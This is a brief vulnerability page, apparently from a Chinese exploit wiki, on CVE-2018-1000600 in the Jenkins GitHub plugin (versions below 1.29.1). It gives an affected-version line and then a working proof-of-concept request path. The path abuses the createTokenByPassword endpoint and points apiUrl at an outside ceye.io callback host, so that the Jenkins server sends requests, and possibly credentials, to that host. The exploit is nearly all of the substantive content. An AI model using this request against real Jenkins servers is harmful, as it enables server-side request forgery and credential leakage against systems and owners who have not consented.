# CVE-2018-1000600 Jenkins GitHub 信息泄漏/en
==Affected version==
Jenkins GitHub plugin is less than 1.29.1
The POC used is as follows, where user1 is the user name.
/securityRealm/user/user1/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://xxx.ceye.io
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容